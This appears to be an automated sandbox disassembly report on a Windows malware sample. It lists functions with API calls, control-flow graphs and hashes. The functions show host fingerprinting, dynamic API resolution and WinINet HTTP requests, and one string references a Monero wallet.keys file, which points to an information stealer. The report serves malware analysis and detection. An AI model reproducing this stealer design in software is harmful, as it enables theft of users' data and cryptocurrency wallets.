                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1356 d47690-d476da GetWindowsDirectoryA 1357 d476e3-d47757 GetVolumeInformationA call d48e90 * 3 1356->1357 1358 d476dc 1356->1358 1365 d47768-d4776f 1357->1365 1358->1357 1366 d47771-d4778a call d48e90 1365->1366 1367 d4778c-d477a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 d477b8-d477e8 wsprintfA call d4aa50 1367->1369 1370 d477a9-d477b6 call d4aa50 1367->1370 1377 d4780e-d4781e 1369->1377 1370->1377
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00D476D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47793
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D4779A
                                      • wsprintfA.USER32 ref: 00D477D0
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: 4af01b8410f2b3fc3d279a9e27ca4f7223c075fdb138ffdebbacd37c0ddf65bf
                                      • Instruction ID: b995857fc0d9f75ddc8610eddde3026feca79035bbf57461e2616b10292e70e3
                                      • Opcode Fuzzy Hash: 4af01b8410f2b3fc3d279a9e27ca4f7223c075fdb138ffdebbacd37c0ddf65bf
                                      • Instruction Fuzzy Hash: 7E41A3B1D04248DBDB21DF94CC45BDEBBB8EF08704F104199F649AB280D779AA44CBB5
                                      Function 00D479E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47A10
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D47A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D47A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 348eee8ddc1f49017261222905659e8f84a68593cb53ff0083e0c8a8d4bb3b00
                                      • Instruction ID: d4cf2c64736e2c1cd71ec9c59c7e1b279e322fd7c4342f1fc373fb607127b045
                                      • Opcode Fuzzy Hash: 348eee8ddc1f49017261222905659e8f84a68593cb53ff0083e0c8a8d4bb3b00
                                      • Instruction Fuzzy Hash: CCF04FB1944209EFC710DF98DD46BAEBBB8EB05711F10021AFA55A2680C77965048BA1
                                      Function 00D31160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 78844f05a45b58cc9e5af80ca2b1a1033421c495cbed5412d915197b8fbc96d5
                                      • Instruction ID: 8fb2d9cb055ce65631211e665c4dc150957d67e3631bf936ab5218417864b265
                                      • Opcode Fuzzy Hash: 78844f05a45b58cc9e5af80ca2b1a1033421c495cbed5412d915197b8fbc96d5
                                      • Instruction Fuzzy Hash: 7BD05E7490030C9BCB10DFE498496DDBB79BB0C215F000554D94562280EA356445CB65
                                      Function 00D49F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 d49f20-d49f2a 634 d4a346-d4a3da LoadLibraryA * 8 633->634 635 d49f30-d4a341 GetProcAddress * 43 633->635 636 d4a456-d4a45d 634->636 637 d4a3dc-d4a451 GetProcAddress * 5 634->637 635->634 638 d4a526-d4a52d 636->638 639 d4a463-d4a521 GetProcAddress * 8 636->639 637->636 640 d4a52f-d4a5a3 GetProcAddress * 5 638->640 641 d4a5a8-d4a5af 638->641 639->638 640->641 642 d4a5b5-d4a642 GetProcAddress * 6 641->642 643 d4a647-d4a64e 641->643 642->643 644 d4a654-d4a72a GetProcAddress * 9 643->644 645 d4a72f-d4a736 643->645 644->645 646 d4a7b2-d4a7b9 645->646 647 d4a738-d4a7ad GetProcAddress * 5 645->647 648 d4a7ec-d4a7f3 646->648 649 d4a7bb-d4a7e7 GetProcAddress * 2 646->649 647->646 650 d4a825-d4a82c 648->650 651 d4a7f5-d4a820 GetProcAddress * 2 648->651 649->648 652 d4a922-d4a929 650->652 653 d4a832-d4a91d GetProcAddress * 10 650->653 651->650 654 d4a98d-d4a994 652->654 655 d4a92b-d4a988 GetProcAddress * 4 652->655 653->652 656 d4a996-d4a9a9 GetProcAddress 654->656 657 d4a9ae-d4a9b5 654->657 655->654 656->657 658 d4a9b7-d4aa13 GetProcAddress * 4 657->658 659 d4aa18-d4aa19 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,01665850), ref: 00D49F3D
                                      • GetProcAddress.KERNEL32(74DD0000,01665990), ref: 00D49F55
                                      • GetProcAddress.KERNEL32(74DD0000,01679670), ref: 00D49F6E
                                      • GetProcAddress.KERNEL32(74DD0000,016796A0), ref: 00D49F86
                                      • GetProcAddress.KERNEL32(74DD0000,016796B8), ref: 00D49F9E
                                      • GetProcAddress.KERNEL32(74DD0000,016796D0), ref: 00D49FB7
                                      • GetProcAddress.KERNEL32(74DD0000,0166B810), ref: 00D49FCF
                                      • GetProcAddress.KERNEL32(74DD0000,0167D2F0), ref: 00D49FE7
                                      • GetProcAddress.KERNEL32(74DD0000,0167D170), ref: 00D4A000
                                      • GetProcAddress.KERNEL32(74DD0000,0167D218), ref: 00D4A018
                                      • GetProcAddress.KERNEL32(74DD0000,0167D338), ref: 00D4A030
                                      • GetProcAddress.KERNEL32(74DD0000,016659B0), ref: 00D4A049
                                      • GetProcAddress.KERNEL32(74DD0000,016659D0), ref: 00D4A061
                                      • GetProcAddress.KERNEL32(74DD0000,016659F0), ref: 00D4A079
                                      • GetProcAddress.KERNEL32(74DD0000,01665710), ref: 00D4A092
                                      • GetProcAddress.KERNEL32(74DD0000,0167D368), ref: 00D4A0AA
                                      • GetProcAddress.KERNEL32(74DD0000,0167D230), ref: 00D4A0C2
                                      • GetProcAddress.KERNEL32(74DD0000,0166B9C8), ref: 00D4A0DB
                                      • GetProcAddress.KERNEL32(74DD0000,016656D0), ref: 00D4A0F3
                                      • GetProcAddress.KERNEL32(74DD0000,0167D260), ref: 00D4A10B
                                      • GetProcAddress.KERNEL32(74DD0000,0167D398), ref: 00D4A124
                                      • GetProcAddress.KERNEL32(74DD0000,0167D1D0), ref: 00D4A13C
                                      • GetProcAddress.KERNEL32(74DD0000,0167D2C0), ref: 00D4A154
                                      • GetProcAddress.KERNEL32(74DD0000,01665A10), ref: 00D4A16D
                                      • GetProcAddress.KERNEL32(74DD0000,0167D2A8), ref: 00D4A185
                                      • GetProcAddress.KERNEL32(74DD0000,0167D248), ref: 00D4A19D
                                      • GetProcAddress.KERNEL32(74DD0000,0167D320), ref: 00D4A1B6
                                      • GetProcAddress.KERNEL32(74DD0000,0167D308), ref: 00D4A1CE
                                      • GetProcAddress.KERNEL32(74DD0000,0167D278), ref: 00D4A1E6
                                      • GetProcAddress.KERNEL32(74DD0000,0167D158), ref: 00D4A1FF
                                      • GetProcAddress.KERNEL32(74DD0000,0167D380), ref: 00D4A217
                                      • GetProcAddress.KERNEL32(74DD0000,0167D290), ref: 00D4A22F
                                      • GetProcAddress.KERNEL32(74DD0000,0167D3B0), ref: 00D4A248
                                      • GetProcAddress.KERNEL32(74DD0000,0167A480), ref: 00D4A260
                                      • GetProcAddress.KERNEL32(74DD0000,0167D110), ref: 00D4A278
                                      • GetProcAddress.KERNEL32(74DD0000,0167D2D8), ref: 00D4A291
                                      • GetProcAddress.KERNEL32(74DD0000,01665A30), ref: 00D4A2A9
                                      • GetProcAddress.KERNEL32(74DD0000,0167D350), ref: 00D4A2C1
                                      • GetProcAddress.KERNEL32(74DD0000,01665A70), ref: 00D4A2DA
                                      • GetProcAddress.KERNEL32(74DD0000,0167D188), ref: 00D4A2F2
                                      • GetProcAddress.KERNEL32(74DD0000,0167D1A0), ref: 00D4A30A
                                      • GetProcAddress.KERNEL32(74DD0000,01665730), ref: 00D4A323
                                      • GetProcAddress.KERNEL32(74DD0000,01665D10), ref: 00D4A33B
                                      • LoadLibraryA.KERNEL32(0167D1B8,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A34D
                                      • LoadLibraryA.KERNEL32(0167D0F8,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A35E
                                      • LoadLibraryA.KERNEL32(0167D3C8,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A370
                                      • LoadLibraryA.KERNEL32(0167D3E0,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A382
                                      • LoadLibraryA.KERNEL32(0167D128,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A393
                                      • LoadLibraryA.KERNEL32(0167D140,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A3A5
                                      • LoadLibraryA.KERNEL32(0167D1E8,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A3B7
                                      • LoadLibraryA.KERNEL32(0167D200,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A3C8
                                      • GetProcAddress.KERNEL32(75290000,01665D50), ref: 00D4A3EA
                                      • GetProcAddress.KERNEL32(75290000,0167D500), ref: 00D4A402
                                      • GetProcAddress.KERNEL32(75290000,016791F8), ref: 00D4A41A
                                      • GetProcAddress.KERNEL32(75290000,0167D410), ref: 00D4A433
                                      • GetProcAddress.KERNEL32(75290000,01665AB0), ref: 00D4A44B
                                      • GetProcAddress.KERNEL32(734C0000,0166B770), ref: 00D4A470
                                      • GetProcAddress.KERNEL32(734C0000,01665E10), ref: 00D4A489
                                      • GetProcAddress.KERNEL32(734C0000,0166B6D0), ref: 00D4A4A1
                                      • GetProcAddress.KERNEL32(734C0000,0167D488), ref: 00D4A4B9
                                      • GetProcAddress.KERNEL32(734C0000,0167D470), ref: 00D4A4D2
                                      • GetProcAddress.KERNEL32(734C0000,01665E30), ref: 00D4A4EA
                                      • GetProcAddress.KERNEL32(734C0000,01665C70), ref: 00D4A502
                                      • GetProcAddress.KERNEL32(734C0000,0167D4D0), ref: 00D4A51B
                                      • GetProcAddress.KERNEL32(752C0000,01665BD0), ref: 00D4A53C
                                      • GetProcAddress.KERNEL32(752C0000,01665E50), ref: 00D4A554
                                      • GetProcAddress.KERNEL32(752C0000,0167D530), ref: 00D4A56D
                                      • GetProcAddress.KERNEL32(752C0000,0167D4A0), ref: 00D4A585
                                      • GetProcAddress.KERNEL32(752C0000,01665D90), ref: 00D4A59D
                                      • GetProcAddress.KERNEL32(74EC0000,0166B720), ref: 00D4A5C3
                                      • GetProcAddress.KERNEL32(74EC0000,0166B928), ref: 00D4A5DB
                                      • GetProcAddress.KERNEL32(74EC0000,0167D4E8), ref: 00D4A5F3
                                      • GetProcAddress.KERNEL32(74EC0000,01665B70), ref: 00D4A60C
                                      • GetProcAddress.KERNEL32(74EC0000,01665AF0), ref: 00D4A624
                                      • GetProcAddress.KERNEL32(74EC0000,0166B978), ref: 00D4A63C
                                      • GetProcAddress.KERNEL32(75BD0000,0167D518), ref: 00D4A662
                                      • GetProcAddress.KERNEL32(75BD0000,01665AD0), ref: 00D4A67A
                                      • GetProcAddress.KERNEL32(75BD0000,016791E8), ref: 00D4A692
                                      • GetProcAddress.KERNEL32(75BD0000,0167D4B8), ref: 00D4A6AB
                                      • GetProcAddress.KERNEL32(75BD0000,0167D548), ref: 00D4A6C3
                                      • GetProcAddress.KERNEL32(75BD0000,01665BF0), ref: 00D4A6DB
                                      • GetProcAddress.KERNEL32(75BD0000,01665B10), ref: 00D4A6F4
                                      • GetProcAddress.KERNEL32(75BD0000,0167D590), ref: 00D4A70C
                                      • GetProcAddress.KERNEL32(75BD0000,0167D560), ref: 00D4A724
                                      • GetProcAddress.KERNEL32(75A70000,01665C10), ref: 00D4A746
                                      • GetProcAddress.KERNEL32(75A70000,0167D578), ref: 00D4A75E
                                      • GetProcAddress.KERNEL32(75A70000,0167D5A8), ref: 00D4A776
                                      • GetProcAddress.KERNEL32(75A70000,0167D3F8), ref: 00D4A78F
                                      • GetProcAddress.KERNEL32(75A70000,0167D428), ref: 00D4A7A7
                                      • GetProcAddress.KERNEL32(75450000,01665D30), ref: 00D4A7C8
                                      • GetProcAddress.KERNEL32(75450000,01665B30), ref: 00D4A7E1
                                      • GetProcAddress.KERNEL32(75DA0000,01665BB0), ref: 00D4A802
                                      • GetProcAddress.KERNEL32(75DA0000,0167D440), ref: 00D4A81A
                                      • GetProcAddress.KERNEL32(6F070000,01665C30), ref: 00D4A840
                                      • GetProcAddress.KERNEL32(6F070000,01665C50), ref: 00D4A858
                                      • GetProcAddress.KERNEL32(6F070000,01665B50), ref: 00D4A870
                                      • GetProcAddress.KERNEL32(6F070000,0167D458), ref: 00D4A889
                                      • GetProcAddress.KERNEL32(6F070000,01665CF0), ref: 00D4A8A1
                                      • GetProcAddress.KERNEL32(6F070000,01665B90), ref: 00D4A8B9
                                      • GetProcAddress.KERNEL32(6F070000,01665C90), ref: 00D4A8D2
                                      • GetProcAddress.KERNEL32(6F070000,01665CB0), ref: 00D4A8EA
                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00D4A901
                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00D4A917
                                      • GetProcAddress.KERNEL32(75AF0000,0167D0B0), ref: 00D4A939
                                      • GetProcAddress.KERNEL32(75AF0000,01679218), ref: 00D4A951
                                      • GetProcAddress.KERNEL32(75AF0000,0167CE88), ref: 00D4A969
                                      • GetProcAddress.KERNEL32(75AF0000,0167CEA0), ref: 00D4A982
                                      • GetProcAddress.KERNEL32(75D90000,01665CD0), ref: 00D4A9A3
                                      • GetProcAddress.KERNEL32(6E3C0000,0167D0C8), ref: 00D4A9C4
                                      • GetProcAddress.KERNEL32(6E3C0000,01665D70), ref: 00D4A9DD
                                      • GetProcAddress.KERNEL32(6E3C0000,0167D0E0), ref: 00D4A9F5
                                      • GetProcAddress.KERNEL32(6E3C0000,0167D008), ref: 00D4AA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: c18d297694293ccf1c17a7c64fe96a8d68bc4d6b69642af39e77bb02a26dc245
                                      • Instruction ID: 0d4d8a39610d11afaeb06c12755433fdcc31995d5b0d0d878c040fa246916efe
                                      • Opcode Fuzzy Hash: c18d297694293ccf1c17a7c64fe96a8d68bc4d6b69642af39e77bb02a26dc245
                                      • Instruction Fuzzy Hash: 486221B55102409FC376DFA8E88899677BAB74D701F10851ABAC9C3298D73FB951CFA0
                                      Function 00D348D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 801 d348d0-d34992 call d4aab0 call d34800 call d4aa50 * 5 InternetOpenA StrCmpCA 816 d34994 801->816 817 d3499b-d3499f 801->817 816->817 818 d349a5-d34b1d call d48cf0 call d4ac30 call d4abb0 call d4ab10 * 2 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4ac30 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4ac30 call d4abb0 call d4ab10 * 2 InternetConnectA 817->818 819 d34f1b-d34f43 InternetCloseHandle call d4ade0 call d3a210 817->819 818->819 905 d34b23-d34b27 818->905 829 d34f82-d34ff2 call d48b20 * 2 call d4aab0 call d4ab10 * 8 819->829 830 d34f45-d34f7d call d4ab30 call d4acc0 call d4abb0 call d4ab10 819->830 830->829 906 d34b35 905->906 907 d34b29-d34b33 905->907 908 d34b3f-d34b72 HttpOpenRequestA 906->908 907->908 909 d34b78-d34e78 call d4acc0 call d4abb0 call d4ab10 call d4ac30 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4ac30 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4ac30 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4ac30 call d4abb0 call d4ab10 call d4aa50 call d4ac30 * 2 call d4abb0 call d4ab10 * 2 call d4ade0 lstrlen call d4ade0 * 2 lstrlen call d4ade0 HttpSendRequestA 908->909 910 d34f0e-d34f15 InternetCloseHandle 908->910 1021 d34e82-d34eac InternetReadFile 909->1021 910->819 1022 d34eb7-d34f09 InternetCloseHandle call d4ab10 1021->1022 1023 d34eae-d34eb5 1021->1023 1022->910 1023->1022 1024 d34eb9-d34ef7 call d4acc0 call d4abb0 call d4ab10 1023->1024 1024->1021
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34889
                                        • Part of subcall function 00D34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34899
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D34965
                                      • StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D3498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D34B0A
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00D50DDE,00000000,?,?,00000000,?,",00000000,?,0167E908), ref: 00D34E38
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D34E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D34E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D34E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00D34EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00D34F15
                                      • HttpOpenRequestA.WININET(00000000,0167E7A8,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D34B65
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00D34F1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 460715078-2180234286
                                      • Opcode ID: d14a4acc3a4ec6a6dbae91569ec76176c24afff4a59980951be26a87b229b408
